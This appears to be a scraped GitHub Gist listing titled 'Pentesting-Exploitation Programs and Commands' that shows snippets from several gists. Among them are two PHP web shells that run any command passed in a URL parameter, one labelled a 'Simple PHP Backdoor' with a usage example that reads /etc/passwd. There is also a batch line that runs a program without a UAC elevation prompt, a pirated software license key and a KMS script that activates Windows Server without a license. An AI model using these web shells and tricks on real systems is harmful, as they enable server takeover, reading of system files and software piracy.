Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set __COMPAT_LAYER=RunAsInvoker | |
Start fun.exe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This network configuration written for MTB | |
network: | |
version: 2 | |
ethernets: | |
ens160: | |
addresses: | |
- 172.16.21.230/24 | |
nameservers: | |
addresses: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
:menu | |
cls | |
echo MAC Address Changer Menu | |
echo Swarup Saha | |
echo. | |
echo 1. Change MAC Address | |
echo 2. Reset MAC Address | |
echo 3. Exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import poe, sys | |
client = poe.Client("<POE_API_KEY_HERE>") | |
title=sys.argv[1] | |
path=sys.argv[2] | |
more="" | |
if len(sys.argv) > 3: | |
more="\" and here is more information: "+sys.argv[3] | |
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php system($_GET['cmd']); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
—– BEGIN LICENSE —– | |
Mifeng User | |
Single User License | |
EA7E-1184812 | |
C0DAA9CD 6BE825B5 FF935692 1750523A | |
EDF59D3F A3BD6C96 F8D33866 3F1CCCEA | |
1C25BE4D 25B1C4CC 5110C20E 5246CC42 | |
D232C83B C99CCC42 0E32890C B6CBF018 | |
B1D4C178 2F9DDB16 ABAA74E5 95304BEF | |
9D0CCFA9 8AF8F8E2 1E0A955E 4771A576 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
title Activate Windows Server (ALL versions) for FREE - MSGuides.com&cls&echo =====================================================================================&echo #Project: Activating Microsoft software products for FREE without additional software&echo =====================================================================================&echo.&echo #Supported products:&echo http://bit.ly/kmsclientkeys&echo.&echo.&echo ============================================================================&echo Activating your Windows...&set i=1 | |
cscript //nologo slmgr.vbs /ipk 4DWFP-JF3DJ-B7DTH-78FJB-PDRHK >nul||cscript //nologo slmgr.vbs /ipk 22XQ2-VRXRG-P8D42-K34TD-G3QQC >nul||cscript //nologo slmgr.vbs /ipk 7M67G-PC374-GR742-YH8V4-TCBY3 >nul||cscript //nologo slmgr.vbs /ipk RCTX3-KWVHP-BR6TB-RB6DM-6X7HP >nul||cscript //nologo slmgr.vbs /ipk 39BXF-X8Q23-P2WWT-38T2F-G3FPG >nul||cscript //nologo slmgr.vbs /ipk YQGMW-MPWTJ-34KDK-48M3W-X4Q6V >nul||cscript //nologo slmgr.vbs /ipk W7VD6-7JFBR-RX26B-YKQ3Y-6FFFJ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Simple PHP Backdoor By DK (One-Liner Version) --> | |
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd --> | |
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> |
NewerOlder